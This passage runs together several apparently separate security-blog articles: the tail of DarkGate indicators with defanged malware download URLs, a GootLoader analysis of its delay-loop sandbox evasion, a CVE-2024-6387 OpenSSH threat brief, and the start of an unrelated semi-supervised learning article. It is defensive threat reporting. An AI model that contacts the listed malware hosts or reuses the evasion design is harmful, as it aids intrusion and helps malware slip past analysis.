44a54797ca1ee9c896ce95d78b24d6b710c2d4bcb6f0bcdc80cd79ab95f1f096  XLSX file containing embedded object pointing to SMB URL hosting JS file
b28473a7e5281f63fd25b3cb75f4e3346112af6ae5de44e978d6cf2aac1538c1  XLSX file containing embedded object pointing to SMB URL hosting JS file

Examples of SHA256 hashes for JS or VBS files used for DarkGate infections:

  • 96e22fa78d6f5124722fe20850c63e9d1c1f38c658146715b4fb071112c7db13
  • F9d8b85fac10f088ebbccb7fe49274a263ca120486bceab6e6009ea072cb99c0
  • 2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f

Examples of SHA256 hashes for PowerShell scripts used for DarkGate infections:

  • 9b2be97c2950391d9c16497d4362e0feb5e88bfe4994f6d31b4fda7769b1c780
  • 9a2a855b4ce30678d06a97f7e9f4edbd607f286d2a6ea1dde0a1c55a4512bb29
  • 51ab25a9a403547ec6ac5c095d904d6bc91856557049b5739457367d17e831a7
  • b4156c2cd85285a2cb12dd208fcecb5d88820816b6371501e53cb47b4fe376fd

SHA256 hash for copy of AutoHotKey EXE used for these infections (not malicious):

  • 897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb

Examples the URLs used to retrieve and run AutoHotKey packages for DarkGate malware:

March 12, 2024:

  • hxxp://adfhjadfbjadbfjkhad44jka[.]com/aa
  • hxxp://adfhjadfbjadbfjkhad44jka[.]com/xxhhodrq
  • hxxp://adfhjadfbjadbfjkhad44jka[.]com/zanmjtvh

March 13, 2024:

  • hxxp://nextroundst[.]com/aa
  • hxxp://nextroundst[.]com/ffcxlohx
  • hxxp://nextroundst[.]com/nlcsphze

March 15, 2024:

  • hxxp://diveupdown[.]com/aa
  • hxxp://diveupdown[.]com/aaa
  • hxxp://diveupdown[.]com/hlsxaifp
  • hxxp://diveupdown[.]com/yhmrmmgc

Additional Resources

Dissecting GootLoader With Node.js

Executive Summary

This article shows how to circumvent anti-analysis techniques from GootLoader malware while using Node.js debugging in Visual Studio Code. This evasion technique used by GootLoader JavaScript files can present a formidable challenge for sandboxes attempting to analyze the malware.

Sandboxes with limited computing resources can struggle to analyze a large volume of binaries. Malware often takes advantage of this to evade analysis by delaying its malicious actions, which is commonly described as “sleeping.”

GootLoader is a backdoor and loader malware that its operators have actively distributed through fake forum posts. The infection process of GootLoader starts with a JavaScript file.

Palo Alto Networks customers are better protected from these threats through our Next-Generation Firewall with Cloud-Delivered Security Services including Advanced WildFire, as well as through Cortex XDR. If you think you might have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team.

Related Unit 42 Topics GootLoader, Evasion, Memory Detection

Background

Gootkit was first reported in 2014, and it underwent many changes over time. In 2020, at least one source identified a JavaScript-based type of malware named Gootkit Loader, which its operators distributed through fake forum posts. The group behind this campaign has kept the same distribution tactic and as of 2024 they continue using fake forum posts that are nearly identical in appearance.

Many security vendors shorten Gootkit Loader to GootLoader when referring to these JavaScript files. While the original Gootkit malware was a Windows executable, GootLoader is JavaScript-based malware, and it can deliver other types of malware, including ransomware.

Since January 2024, we have investigated several GootLoader samples. The infection chain is shown below in Figure 1.

INFECTION CHAIN: fake forum page>link for ZIP download>downloaded ZIP archive>victim double-clicks JS file from ZIP>GootLoader installs and is made persistent through scheduled task>GootLoader web-based C2 traffic
Figure 1. Flowchart for a GootLoader infection we saw in March 2024.

Sandboxing is a widely adopted method of identifying malicious binaries that involves analyzing the behavior of binaries within a controlled environment. Sandboxes encounter hurdles when analyzing a large volume of binaries with limited computing resources.

Malware often exploits these challenges by intentionally delaying malicious actions within the sandbox to conceal its true intent. These delaying actions are commonly described as the malware sleeping.

Common Ways for JavaScript Malware to Sleep

The most common way for malware to sleep is to simply call the methods Wscript.sleep() or setTimeout(). However, many sandboxes easily detect these methods. In the following paragraphs we dissect one of the least-mentioned methods GootLoader uses to evade detection.

Stepping Into the Code

In this section we leverage Node.js debugging in Visual Studio Code to analyze the following GootLoader file on a Windows host:

  • SHA256 hash: c853d91501111a873a027bd3b9b4dab9dd940e89fcfec51efbb6f0db0ba6687b
  • File size: 860,920 bytes
  • File name: what cards are legal in goat format 35435.js
  • First submitted to VirusTotal: Jan. 9, 2024

In our debugging endeavor for GootLoader files, we use a Windows host with Node.js JavaScript runtime and Visual Studio Code installed. In this environment, we can step through the code using Node.js debugging in the Visual Studio Code editor.

This environment offers an effective approach to comprehend the malware's flow control and execution logic. Typically, Windows Script Host (wscript.exe) runs standalone JavaScript files in a Windows environment. However, by employing Node.js and Visual Studio Code, we can step through the JavaScript file's execution, set breakpoints in the code and use the immediate window to evaluate expressions. While this approach offers significant advantages, certain JavaScript functions might not be supported by Node.js.

As an obfuscation technique, the authors of GootLoader have interwoven lines of GootLoader code among legitimate JavaScript library code. Throughout our debugging process, we observed the code execution that appeared to be seemingly stuck within the confines of a particular loop. Below, Figure 2 shows a snippet of code from one of these loops.

The process of a Gootloader infection occurring on Wednesday, March 13, 2024, starting from a fake forum page, leading to a ZIP download link, which progresses to the downloading of a ZIP archive containing a JavaScript file, its installation, the creation of a persistent scheduled task, and finally resulting in web-based command and control (C2) traffic.
Figure 2. Code execution from a GootLoader sample that appeared to be stuck in a loop when analyzing the file using Node.js debugging in Visual Studio Code.

To gain a better understanding of these loops, let's delve into the surrounding code from the loop in Figure 2. Below, Figure 3 shows an isolated rendition of the original code that we will focus on.

A screenshot of a computer screen displaying a code snippet in a dark theme IDE. The code contains functions and variables in various colors such as purple, blue, and orange.
Figure 3. Code loop from Figure 2.

In Figure 3, the while function within the code causes an infinite loop, because the variable jobcv is consistently assigned the value 1. Additionally, the variable oftenfs acts as a counter, which has been initialized with the value 8242.

The pivotal line within this loop is rangez=(horseq7[oftenfs](oftenfs));. The successful execution of this line relies on the function array horsqe7 pointing to an actual function. The loop persists until the counter oftenfs reaches the value 2597242, at which the function array horsqe7 references the sleepy function.

This made the code appear to be stuck in a loop, because within our analysis environment, it took over 10 minutes for the counter oftenfs to attain the value 2597242.

Next, we stepped into the sleepy function. Inside the sleepy function, we observed a familiar function array name from Figure 3. This function array, horseq7, is assigned with a function named indicated6 as shown below in Figure 4.

A screenshot of code in an IDE, showing a function named "sleepy" with unusual variable names. Line 3802 highlights a line of code marked with a lightbulb emoji: horseq(5210044); = indicate6;'.
Figure 4. Finding the horseq7 function array name inside the sleepy function.

After more delays, code execution will land inside the indicate6 function. This time the lclft4 function is assigned into the function array horseq7 as shown below in Figure 5.

Screenshot of computer code in a text editor with syntax highlighting, displaying a function named 'indicate6' with three parameters and several lines of code assigning values to variables.
Figure 5. Inside the indicate6 function.

Again with more delays, code execution will reach the course83 function shown below in Figure 6. The function course83 is where the actual malicious code begins execution.

Close-up of a computer screen displaying lines of code in a programming environment. Specific code functions are visible, such as "courses3" and assignments like "horseq7 = camel;". The syntax includes both text and parentheses, highlighting variables and functions.
Figure 6. Inside the course83 function.

Finally, debugging the course83 function unveils and deobfuscates JavaScript code that initiates GootLoader's malicious functions. Below, Figure 7 shows a section of the deobfuscated malicious GootLoader code.

A code editor with many lines of script written in a programming language. The code snippets include functions, condition checks, and variables relating to managing tasks within a computer system. The background of the screen is dark with text highlighted in blue, yellow, and white for clarity.
Figure 7. Snippet of deobfuscated malicious GootLoader code.

The creators of GootLoader employed time-consuming while loops with arrays of functions to deliberately delay the execution of malicious code. This method effectively implements an evasion technique, inducing sleep periods to obfuscate the malicious nature of GootLoader.

Table 1 lists the counter values and their assigned functions in the order they were called from the GootLoader JavaScript code.

Counter Value Function Name
2597242 sleepy
5210044 indicate6
6001779 lclft4
6690534 course83

Table 1. Counter values and their assigned functions from the GootLoader sample.

Conclusion

Leveraging our insights gained from analyzing the evasion technique used by GootLoader, we can enhance our ability to detect, analyze and develop effective countermeasures against malicious software. Through continuous collaboration and knowledge sharing, we can collectively stay ahead of cybercriminals to help safeguard our digital systems and networks.

Palo Alto Networks customers are better protected from GootLoader and similar threats through the following products:

If you think you might have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

SHA256 Hashes of GootLoader JavaScript Files

  • b939ec9447140804710f0ce2a7d33ec89f758ff8e7caab6ee38fe2446e3ac988
  • c853d91501111a873a027bd3b9b4dab9dd940e89fcfec51efbb6f0db0ba6687b

Threat Brief: CVE-2024-6387 OpenSSH RegreSSHion Vulnerability

Executive Summary

On July 1, 2024, a critical signal handler race condition vulnerability was disclosed in OpenSSH servers (sshd) on glibc-based Linux systems. This vulnerability, called RegreSSHion and tracked as CVE-2024-6387, can result in unauthenticated remote code execution (RCE) with root privileges. This vulnerability has been rated High severity (CVSS 8.1).

This vulnerability impacts the following OpenSSH server versions:

  • Open SSH version between 8.5p1-9.8p1
  • Open SSH versions earlier than 4.4p1, if they’ve not backport-patched against CVE-2006-5051 or patched against CVE-2008-4109

The SSH features in PAN-OS are not affected by CVE-2024-6387.

Using Palo Alto Networks Xpanse data, we observed 23 million instances of OpenSSH servers including all versions. We saw over 7 million exposed instances of OpenSSH versions 8.5p1-9.7p1 globally as of July 1, 2024. Including older versions (4.3p1 and earlier), we see 7.3 million total. However, this is likely to be an overcount of vulnerable versions as there is no reliable way to account for backporting, in which instances are running patched versions but displaying impacted version numbers. These numbers also do not account for OS-level specifications or configurations that could be required for the vulnerability.

While there is PoC code for this vulnerability, there is no known activity in the wild as of July 2, 2024. Our testing of this code suggests it is not functional. We have been unable to successfully exploit the CVE-2024-6387 vulnerability with this PoC to achieve remote code execution.

Palo Alto Networks also recommends updating all OpenSSH instances to the latest version of OpenSSH, later than v9.8p1.

Palo Alto Networks customers receive protections from and mitigations for CVE-2024-6387 in the following ways:

The Unit 42 Incident Response team can also be engaged to help with a compromise or to provide a proactive assessment to lower your risk.

Palo Alto Networks customers are better protected from vulnerabilities discussed in this article through Cortex XSOAR, XDR and XSIAM. Customers are also better protected through our Next-Generation Firewall with Cloud-Delivered Security Services, including Advanced WildFire. Customers can access external SSH exposure detection from Cortex Xpanse and XSIAM. Customers are also better protected by Prisma Cloud through tooling such as Prisma Cloud’s agent or agentless vulnerability scanning and Software Composition Analysis (SCA) tools, which assist in identifying vulnerable resources across the cloud development lifecycle.

Vulnerabilities Discussed CVE-2024-6387

Details of the Vulnerability

Researchers at Qualys discovered that the OpenSSH server process sshd is vulnerable to a signal handler race condition, enabling unauthenticated remote code execution with root privileges on glibc-based Linux systems in its default configuration. OpenSSH is an open-source suite of tools for remote sign-in and data transfer, using the Secure Shell (SSH) protocol.

This vulnerability can be exploited remotely on glibc-based Linux systems due to syslog() calling async-signal-unsafe functions like malloc() and free(), leading to unauthenticated remote code execution as root.

This occurs because sshd's privileged code is not sandboxed and runs with full privileges. OpenBSD is not vulnerable because its signal alarm (SIGALRM) handler uses syslog_r(), an async-signal-safe version of syslog().

Table 1 shows the vulnerable versions associated with CVE-2024-6387.

Version Vulnerability Determination
OpenSSH < 4.4p1 YES
If backport-patched against CVE-2006-5051 and CVE-2008-4109: NO
4.4p1 <= OpenSSH < 8.5p1 NO
8.5p1 <= OpenSSH < 9.8p1 YES

Table 1. Breakdown of vulnerable OpenSSH versions associated with CVE-2024-6387.

According to OpenSSH’s release notes on July 1, 2024, successful exploitation has been shown on 32-bit Linux/glibc systems with address space layout randomization (ASLR). This exploitation typically requires 6-8 hours of continuous connections under lab conditions up to the server's maximum capacity.

A public PoC for CVE 2024-6387 was committed to the repository of GitHub user zgzhang by user 7etsuo on July 1, 2024. We have been unable to successfully exploit the CVE-2024-6387 vulnerability with this PoC to achieve remote code execution in our testing environment.

Using Palo Alto Networks Xpanse data, we observed 23 million instances of OpenSSH servers including all versions. We saw over 7 million exposed instances of OpenSSH versions 8.5p1-9.7p1 globally as of July 1, 2024. Including older versions (4.3p1 and earlier), we see 7.3 million total. However, this is likely to be an overcount of vulnerable versions as there is no reliable way to account for backporting, in which instances are running patched versions but displaying impacted version numbers. These numbers also do not account for OS-level specifications or configurations that could be required for the vulnerability.

Table 2 shows the geographic distribution of our observations of vulnerable versions 8.5p1-9.7p1.

Country Unique IP Addresses
United States 2,173,896
Germany  905,859
China 435,490
Singapore  296,226
Russia 275,197
The Netherlands 261,212
France  248,153
United Kingdom 237,329
India 230,320
Japan  227,663
Korea  136,852
Canada 119,924
Finland 110,516
Hong Kong 103,685
Australia 100,780

Table 2. Top 15 Countries Exposed to CVE-2024-6387 as of July 1, 2024.

Current Scope of the Attack

While there is PoC code for this vulnerability, there is no known activity in the wild as of July 2, 2024. Our testing of this code suggests it is not functional in our testing environment. We have been unable to successfully exploit the CVE-2024-6387 vulnerability with this PoC to achieve remote code execution.

Interim Guidance

Palo Alto Networks recommends updating all OpenSSH instances to the latest version of OpenSSH, later than v9.8p1.

Prisma Cloud detects the presence of any cloud resource that is vulnerable to CVE-2024-6387 as shown in Figure 1, including VM, serverless, container resources and cloud image repositories.

Screenshot of a "CVE Viewer" in Prisma Cloud, displaying a search bar with the text "CVE-2024-6387" entered, and search results showing columns for CVE, Product, Date, Review, Severity, Affected Version, and Fix Date. The columns for Product, Date, Review, and Fix date are empty, while the Severity column lists "High."
Figure 1. Prisma Cloud vulnerability detection status.

Prisma Cloud customers can query their cloud environments for cloud resources that contain the CVE-2024-6387 vulnerability that are also internet accessible, as shown in Figure 2.

Screenshot of a digital interface for searching vulnerabilities with a focus on a specific CVE ID. Features include a search bar labeled "INVESTIGATE," buttons for "Background Jobs" and a query library, and a section to hide or display the search query. The main display shows a highlighted CVE ID, "CVE-2024-6387," in the process of being added for investigation focused on the term "Vulnerability.
Figure 2. Prisma Cloud investigation for CVE-2024-6387.

If instances of the RegreSSHion vulnerability are found within cloud resources, they should be updated to the latest version of OpenSSH and an investigation should be started to ensure no malicious connections were established with the vulnerable cloud resources.

Unit 42 Managed Threat Hunting Queries

The Unit 42 Managed Threat Hunting team continues to monitor any developments related to the exploitation of this CVE. Cortex XDR customers can use the XQL query below to identify hosts running an affected version of OpenSSH.

Conclusion

CVE-2024-6387 (aka RegreSSHion) is a signal handler race condition vulnerability in OpenSSH servers (sshd) on glibc-based Linux systems. This vulnerability is rated High severity (CVSS 8.1), and can result in unauthenticated remote code execution (RCE) with root privileges.

This vulnerability impacts all OpenSSH server versions between 8.5p1-9.8p1, as well as versions earlier than 4.4p1, if they’ve not backport-patched against CVE-2006-5051 or patched against CVE-2008-4109. The SSH features in PAN-OS are not affected by CVE-2024-6387.

While there is PoC code for this vulnerability, there is no known activity in the wild as of July 2, 2024. Our testing of this code suggests it is not functional in our testing environment. We have been unable to successfully exploit the CVE-2024-6387 vulnerability with this PoC to achieve remote code execution.

Palo Alto Networks Product Protections for CVE-2024-6387

Palo Alto Networks customers can leverage a variety of product protections and updates to identify and defend against this threat.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Cortex XSOAR

Cortex XSOAR has released a response pack and playbook for CVE-2024-6387 to help automate and expedite the mitigation process. This playbook automates the following tasks: It begins by collecting, extracting, and enriching indicators. It then searches for vulnerable endpoints using Prisma Cloud and Cortex XDR XQL queries. If vulnerable endpoints are found, there is an option to send a notification email.

Finally, during the mitigation phase, the user is promptly notified with the official OpenSSH CVE-2024-6387 patch and Unit 42 mitigation recommendations.

CVE-2024-6387_-_OpenSSH_RegreSSHion_RCE
Figure 3. Flowchart from Cortex Playbook for CVE-2024-6387.

Cortex XDR and XSIAM

The Cortex XDR and XSIAM agent has multiple layers of defense protecting our customers from activities that might be performed by exploiting this vulnerability. These include the Exploit Prevention, Local AI analysis, Wildfire, Behavioral Threat Protection (BTP), and Reverse Shell Protection modules that stop malicious activity such as this at first sight.

Thanks to our multi-layer security approach, we have different capabilities in place to prevent those activities, such as Behavioral Threat Protection (BTP), Advanced WildFire (AWF), Local Analysis (LA) and Reverse Shell Protection.

Cortex Xpanse

Cortex Xpanse has the ability to identify exposed vulnerable OpenSSH devices on the public internet and escalate these findings to defenders. Customers can enable alerting on this risk by ensuring that the Insecure OpenSSHAttack Surface Rule is enabled. Identified findings can either be viewed in the Threat Response Center or in the incident view of Expander. These findings are also available for Cortex XSIAM customers who have purchased the ASM module. Cortex Xpanse and XSIAM also have the ability to automatically mitigate vulnerable exposed OpenSSH servers.

Prisma Cloud

Prisma Cloud has detection capabilities in place for CVE-2024-6387. Prevention capabilities also exist with Prisma Cloud Agent and Agentless vulnerability scanning. Additionally, Prisma Cloud Software Composition Analysis (SCA) can detect vulnerable cloud resources throughout the cloud development lifecycle, including within cloud image repositories.

Additional Resources

Updated July 3, 2024, at 7:04 a.m. PT to make a small update to the protections information for Cortex XDR and XSIAM. 

Updated July 2, 2024, at 4:20 p.m. PT to adjust for consistency and update protections information for Cortex XDR and XSIAM. 

Updated July 2, 2024, at 1:52 p.m. PT to add product protections information for Cortex XSOAR. 

Updated July 8, 2024, at 2:43 p.m. PT to add Figure 3. 

Updated July 10, 2024, at 3:11 p.m. PT to update the Cortex XSOAR information. 

The Contrastive Credibility Propagation Algorithm in Action: Improving ML-powered Data Loss Prevention

Executive Summary

The Contrastive Credibility Propagation (CCP) algorithm is a novel approach to semi-supervised learning (SSL) developed by AI researchers at Palo Alto Networks to improve model task performance with imbalanced and noisy labeled and unlabeled data. This post is based on our paper, published and presented at The 38th Annual AAAI Conference on Artificial Intelligence (AAAI ‘24). The paper shows that CCP expands robustness to five different data quality issues often found in real-world datasets compared to several state-of-the-art SSL algorithms.

This research better supports practitioners building classifiers with these kinds of datasets. This can help unlock the usefulness of unlabeled data, which is often more abundant and task-relevant but may be too messy for known methods only previously demonstrated to work on clean datasets.

In addition to summarizing the paper at a high level, we illustrate an example of applying CCP to the critical cybersecurity task of machine learning (ML) powered data loss prevention (DLP). DLP is well suited to demonstrate CCP’s unique benefits as real-world DLP traffic is noisy and unviewable due to privacy concerns. Specifically, we focus on building an ML classifier to differentiate sensitive versus non-sensitive text documents. The model also identifies what kind of sensitive data is contained in a sensitive document (e.g., medical information, financial accounting documents, lawsuit proceedings, or source code). We explain how to apply CCP to a DLP deep neural network (DNN) classifier. This is followed by demonstrating the overarching goal of reducing the loss of classification accuracy when moving from a curated test set to real-world data.

Palo Alto Networks customers are better protected from the threats discussed in the above research through our Cloud-Delivered Enterprise DLP product.

Related Unit 42 Topics Machine Learning

Introduction to CCP

Research Question

SSL leverages both labeled and unlabeled data to train a single model. Often, people use SSL to build a classifier (i.e., a model that decides for each sample what class it belongs to from a predefined set of classes).

In this context, a labeled sample means we know in advance what class that sample belongs to, and unlabeled means we do not. However, we can often still extract useful information from the unlabeled data to build a better classifier as indicated in Figure 1. That is what SSL algorithms are designed to do.

Image 1 is a diagram of the trained model with additional data that is unlabeled. From left to right: DNN plus labeled data plus unlabeled data, greater than symbol, DNN plus labeled data. Question mark.
Figure 1. Ideally, a model trained with additional unlabeled data should outperform a model trained only with labeled data.

However, it’s not uncommon for a model trained with SSL to perform worse than one trained only on labeled data (i.e., fully supervised).

Image 2 is a diagram of the SSL workflow. On the left is the training zone. On the right is the inference zone. On the left: zone Image of the Earth. Two arrows point from it: one to a container of labeled data in the training zone. one to a container of unlabeled data in the training and inference zone. An arrow from both the labeled and unlabeled data containers point to DNN in the training zone. Between them is a does not equal symbol and a question mark. A second arrow leading from the unlabeled data leads into the inference zone and points to a second DNN marker, and an arrow leads from that to Verdicts.
Figure 2. A typical SSL workflow. The labeled and unlabeled datasets are often sourced from distinct distributions.

As illustrated in Figure 2, a common reason for this is that the labeled and unlabeled datasets often have distinct properties. They are often sampled from different sources (i.e., distributions).

For example, labeled datasets are typically collected manually offline by practitioners and annotators. Unlabeled data, on the other hand, typically comes from the same source you wish to deploy your model on in the real world.

One of the core motivations of SSL is aligning models to real-world distributions that are too plentiful or messy to label. Curated labeled datasets often take on distinct characteristics from unlabeled data.

By the nature of being unlabeled, the relative frequency of classes in real-world data is typically unknown or even unknowable. Sometimes, unlabeled data is unviewable due to privacy concerns or in the deployment of fully autonomous systems.

More examples of data quality issues are as follows:

  • Concept drift within classes (e.g., change in the prototypical example of a class).
  • Unlabeled data containing data that belongs to no class
  • Errors in the given labels

SSL algorithms are seldom equipped to handle these quality issues, especially combinations thereof. In literature, this often goes unnoticed as, in many works, the sole experimental variable is the number of labels given on otherwise clean and balanced academic datasets.

Our research question is this: can we build an SSL algorithm whose primary objective is to match or outperform a fully supervised baseline for any dataset?

Core Algorithm Components

SSL comes in many flavors. A common, powerful approach is to generate and leverage what are known as pseudo-labels for unlabeled data during training. Illustrated in Figure 3, pseudo-labels are (often soft) labels produced dynamically for unlabeled data during training that are then used as new supervision sources for further training.

In the best-case scenario, if all pseudo-labels are correct, it can be as powerful as if all the unlabeled data were labeled. This is, of course, unrealistic.

It's common for the true class of unlabeled data to be indiscernible from the given label information. This means pseudo-labels will inevitably have errors, which is why pseudo-label approaches are also inherently dangerous. SSL algorithms, especially those implemented with deep neural networks, tend to be very sensitive to these errors in pseudo-supervision.

Image 3 is a graph of batches of data represented by circles. Red circles are Class 1 labeled data. Blue circles are Class 2 labeled data. Circles with red or blue outlines are pseudo labeled. Circles with a black outline are unlabeled. Arrows from the labeled classes point to some of the pseudo-labeled class circles.
Figure 3. Pseudo-labels (faint outlines) are produced for unlabeled samples in a batch of data. The pseudo-labels for the two remaining unlabeled samples are more ambiguous.

To approach our research question, we start with a simple assumption: pseudo-label errors are the root cause of SSL algorithms failing to match or outperform a fully supervised baseline. Intuitively, without those errors, an algorithm should have no issue at least matching the fully supervised baseline.

CCP is designed around this principle. Specifically, we aim to build an SSL algorithm that is foremost robust to the pseudo-label errors that it inevitably produces.

Iterative Pseudo-label Refinement

Learning with noisy labels is a rich field of research. For CCP, we draw inspiration from prior works in this space.

There is an important distinction between class-conditional label noise and instance-dependent label noise. Instance-dependent label noise refers to the type of noise where the probability of label errors depends on the specific characteristics (features) of the instance.

Class-conditional label noise, on the other hand, refers to label errors that are dependent on the true label. Pseudo-label noise is highly instance-dependent as each pseudo-label is generated dynamically on a sample-by-sample basis. This narrows down our search further.

A powerful method previously demonstrated on fully supervised problems is called a self-evolution average label also known as SEAL. The main idea is to train a model with noisy labels and to produce new predictions for every data sample multiple times throughout the training process. You then average those predictions together to produce the next set of labels you’ll use in the next iteration. This works because, in the presence of an incorrect label, your model will often oscillate its prediction between the correct and incorrect class before it typically memorizes the incorrect class late in training.

Averaging those predictions across time slowly pushes the label in the right direction. A similar pattern in pseudo-label oscillations was observed in our study. An example of pseudo-label oscillation is shown in Figure 4.

Image 4 is a graph of predictions of the pseudo-labeled classes. Both the blue and the green line denote the class 1 score which changes over time.
Figure 4. Pseudo-label predictions oscillate between classes throughout training. The blue (green) line depicts the score for class 1 (0). Source: Palo Alto Networks, AI Research.

Early in training, when the model has not overfitted to the wrong label, the score for the true class is high. This is reversed when the model has time to fit itself to the wrong label.

CCP features an outer loop designed to exploit this phenomenon, illustrated in Figure 5. For every batch of data during training, we predict new pseudo-labels for unlabeled data, then average them together to mark the end of an iteration.

Image 5 is the CCP algorithm. The purple zone at the top is the initialization. The cream zone below it is the CCP iteration. Between these zones is when the pseudo labels are replaced and the classifier training happens. The CCP iteration zone includes equations for averaging, scaling, credibility, and clipping.
Figure 5. High-level view of the CCP algorithm. An outer loop iteratively refines a set of pseudo-labels (expressed as credibility vectors) before they are used to build a classifier. Source: Palo Alto Networks, AI Research.

These “CCP iterations,” designed to refine pseudo-labels iteratively, take place strictly before a classifier is ever built. The pseudo-labels are generated transductively, meaning we infer each sample based only on other samples in the batch.

Classifiers are inductive and try to learn generalizable patterns across all data. Importantly, these noisy, batch-level, transductive pseudo-labels are never directly used to supervise our inductive classifier. We clean the pseudo-labels through iterative refinement first.

Credibility Representations

As mentioned previously, it's common for the true class of unlabeled data to be indiscernible from the given label data. This may be due to ambiguity or gaps in the label information.

We’d ideally like to discard pseudo-label information for those samples or otherwise nullify their impact on learning. We adopt a label representation called “credibility vectors” that allows us to do the former.

Traditionally, label vectors are computed via a softmax function. This function transforms a vector of real values (class scores or similarities) into a vector of values all in the range [0, 1] that sums to 1 such that they can be interpreted as probabilities.

The function preserves the ranking of values (i.e., small input values will correspond to small output values and vice versa). Credibility transforms an input vector of class scores/similarities with range [0, 1] into an output vector with range [-1, 1].

In a credibility vector, -1 corresponds to high confidence in class dissimilarity, 0 corresponds to no confidence either way and 1 corresponds to high confidence in class similarity. The core idea of credibility is to condition class similarity measurements on the next highest class similarity (i.e., a large class similarity measure only remains high if no other class similarity measures are also large).

Consider the example in Figure 6.

Image 6 is a formula (left) paired with a graph (right). The graph includes the red and blue classes represented mathematically as the vector and two labels. On the right is the graph of the cross-entropy classification loss and its gradient. The red line represents the softmax. The blue line represents the credibility. While the blue line flows in one straight right from left to right, the red line forms the shape of a U on the topmost portion of the graph above 0.
Figure 6. Left: An unlabeled sample is nearly equally similar to the red and blue classes. From top to bottom: the similarity vector, a softmax label and a credibility label. Right: Cross-entropy classification loss and its gradient when supervised with the softmax (red) and credibility labels (blue). Source: modified from Palo Alto Networks, AI Research.

On the left of Figure 6, we see an unlabeled sample with large class similarity scores of 0.98 and 0.99 to the red and blue classes, respectively. The true label is nearly ambiguous. The softmax label is computed as [0.502,0.498]. The credibility vector is computed as 0.99-0.98=0.01 in the first entry and 0.98-0.99=-0.01 in the second entry (which is clipped to 0).

In SSL, these pseudo-labels are often used to supervise an underlying model with a classification loss. We can see the effect of using each on the standard classification loss function called cross-entropy (Xent) on the right of Figure 6.

In that plot, consider the X-axis the softmax output of a binary classifier for the blue class. Computing cross-entropy with the softmax label induces a strong gradient at either pole despite the true class being nearly ambiguous.

Using the credibility label will ensure the gradient for this sample is near 0 everywhere except for x=0. Where all classes are equally similar, the credibility label would be the zero vector and the gradient would be zero everywhere. This representational capacity is important because we often view incorrect pseudo-labels improving through CCP iterations sometimes just by shrinking in magnitude (e.g., when the true class is indiscernible).

In an ablation analysis in Figure 7, we see a key benefit of credibility representations is differentiating correct versus incorrect pseudo-labels. On average, the strength (maximum value) difference between correct and incorrect pseudo-labels is much greater when using credibility. This is likely due to its more strict criteria for assigning large scores. It is thus a better measure of confidence.

The entire CCP framework, from pseudo-label refinement to classifier building, makes native use of credibility and the better differentiation it provides. Through weighted averages, a sample’s impact on label propagation and all loss functions scales linearly with the magnitude of the single non-zero entry of a credibility label. Zero vectors also provide a natural initialization for pseudo-labels in the first CCP iteration.

Image 7 is a graph of the average strength of the correct credibility pseudo labels (solid green line), the incorrect credibility pseudo labels (red line), the correct softmax pseudo labels (dashed green line) and the incorrect softmax pseudo labels (dashed red line).
Figure 7. A representative example of the average strength of correct and incorrect pseudo-labels when using softmax and credibility.

Subsampling

Figure 7 suggests that the strength of credibility labels is effective at identifying pseudo-labels that are incorrect. Naturally, one may ask if we can use this signal to refine the pseudo-labels during CCP iterations further. We define a subsampling procedure that does just this.

This procedure is optional, but it does help speed up convergence and even converge at better solutions with generalizable settings. At the end of an iteration, we compute a percentage of the weakest pseudo-labels to reset back to their initialization (the zero vector). This allows the network to train on a cleaner pseudo-label set for the next iteration. Reset pseudo-labels will be assigned a new pseudo-label in the next iteration.

What percent of the weakest pseudo-labels should we reset? Resetting too many pseudo-labels can lead to instability in training (i.e., the accuracy of pseudo-labels dropping rapidly or failing to converge across iterations).

We hypothesize that the cause of this instability is similar to the cause of instability observed with self-training techniques. Self-training is the concept of iteratively assigning unlabeled data pseudo-labels and moving them (usually the strongest ones) into the train set. Many state-of-the-art SSL algorithms can be categorized as a form of self-training.

Here, we are resetting existing pseudo-labels that would otherwise be kept. So, in a sense, it’s the inverse of self-training.

A unique strength of CCP is that it is highly stable without subsampling (a theoretical explanation for this is provided in the paper). This awards us a path to balance stability with the desire to reset incorrect pseudo-labels. We consider a wide range of candidate subsampling percentages of the weakest pseudo-labels to reset.

We first compute a probability distribution over classes that summarizes the state of all pseudo-labels in totality (sum them together then divide by the total mass). This serves as our anchor distribution – it's what we want to limit the divergence from.

For each candidate subsampling percentage, we compute a summarizing probability distribution over the pseudo-labels again after resetting the weakest corresponding percent of pseudo-labels. We then have a new summarizing probability distribution for each candidate subsampling percentage.

We compute the Kullback-Leibler divergence (the difference in information between probability distributions) of each candidate distribution from the anchor distribution. These divergence measures represent how much the summarizing probability distribution changes when increasing the candidate subsampling percentage.

To finish subsampling, we simply choose the highest candidate subsampling percentage that obeys a strict limit on the divergence and then apply that to our pseudo-labels. We slowly decrease the strict cap on divergence through CCP iterations to support convergence.

Importantly, this method is free of imposing assumptions and normalized to the dataset size. Accordingly, a single subsampling schedule generates well across all of our experiments.

Examples of an ablation study on subsampling are shown in Figure 8. Specifically, we see the state of pseudo-labels converge faster and the overall accuracy of pseudo-labels increase upon convergence.

Image 8 is a comparison of two graphs. The top graph is the percentage of the pseudo label accuracy compared to the iteration, where the dotted lines represent subsampling turned off. Blue line: Base case. Red line: 25 labels. Yellow line: 4 labels. Pink line: 2 labels. The bottom graph is the percentage of the pseudo label accuracy. Blue line: Base case. Red line: 25 labels. Yellow line: 4 labels. Pink line: 2 labels.
Figure 8. Representative examples of the effect of subsampling on pseudo-label accuracy and convergence through CCP iterations. Dotted (solid) lines correspond to subsampling turned off (on). Source: Palo Alto Networks, AI Research.

Experimental Results

